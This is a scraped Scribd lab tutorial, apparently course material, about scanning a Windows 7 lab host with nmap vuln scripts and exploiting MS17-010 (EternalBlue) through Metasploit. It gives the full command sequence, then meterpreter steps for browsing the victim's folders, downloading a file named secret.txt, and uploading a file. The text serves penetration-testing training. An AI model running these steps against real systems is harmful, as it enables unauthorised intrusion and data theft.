Scribd
Upload
14 views24 pages

(8)Vulnerability Scanning and Ms17 010 Exploit

Uploaded by

Prasanth Kumar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
14 views24 pages

(8)Vulnerability Scanning and Ms17 010 Exploit

Uploaded by

Prasanth Kumar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 24

Vulnerability scanning using nmap

Nse – nmap scripting engine


Nmap supports scripts , where a user can use his own scripts to
scan the vulnerabilities of the target device or user can use nmap
default scripts to find vulnerabilities in the target device

Nmap contains different scripts a ccording to the needs of user


,the scripts will work . Lets assume a user wants to scan
vulnerabilities in target device .

nmap --script vuln 192.168.1.10

Please choose your windows-7 ip from ilabs !


Please choose your windows-7 ip from ilabs !
If target system is vulnerable to any vulnerabiltiies, nmap displays the
list of vulnerabilities in the target system

In this case we are finding eternal blue ( ms17-010)


Nmap shows that the target system is vulnerable to ms17-010
Now exploiting /hacking the target system using the
ms17-010 vulnerability

Step 1 : we need to use Metasploit framework console to exploit


this vulnerability
to run Metasploit framework console type

msfconsole
Step 2 :now we need to search for exploit in msfconsole type

search ms17-010
Step 3:msfconsole displays ways to hack the system, we c hoose
any one of them

use 0
Step 4:now we need to give target ip address to msfconsole

show options
Step5 :to set the target ip address

set RHOSTS 192.168.1.129

NOTE : RHOSTS IS WINDOWS -7 IP FROM ILABS


Step 6: and finally we need cross check the LHOST , AND LPORT.

LHOST is kali linux ip address

to receive the connection from the target the LPORTshould be any port
number as shown in example , choose any port number

ex: 1234,8080,4040,4444,3030,7070, 7001 ,7002


Step 7 : now exploiting the system, type run

run

.
You will see that msfconsole tries to connect to the target system
If you get (win) at the end you have hacked the system
successfully .
NOTE:

In some ca ses if the exploit didn’t work run the command


again

Now you can run screenshot, sysinfo , ipconfig to see the details
of hacked system.
Continuation of ms17-010

After gaining access to the target system we need to check the location of our
meterpreter access by typing : pwd

pwd
Now in windows operating system c:\windows\system32 is the path where we got access
But to see the files of Documents , Downloads ,Pictures , videos etc we
need to change the directory .

So we need to change the location

from C :\windows\system32 → C:\users\jon\Downloads


Now type dir to list the files .
ThThe next step is to move into the users folder

cd users and type dir to see the files in users folder


Now let’s move to jon folder , here jon is the username of
the computer and we can see there is the other user called
dark too.
cd jon and type dir , we can see the desktop , download, documents
folders
Let’s move into downloads folder to see if there are any imp files

cd Downloads.

Now in the next step let’s try to download the secret.txt.txt file into our
kali linux
To download a file from target machne we will use download command along with
the file name

download secret.txt.txt

So the file has been downloaded to our linux let’s open new terminal to
see the downloaded file .
Type ls to list the files

ls

.
Now to upload a file from linux machine → to windows
machine we use upload command along with the file name to
be upload.

Before uploading I m going to create a text file with some


random text in it .
Now let’s upload the hacked.txt file to windows system

upload hacked.txt

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy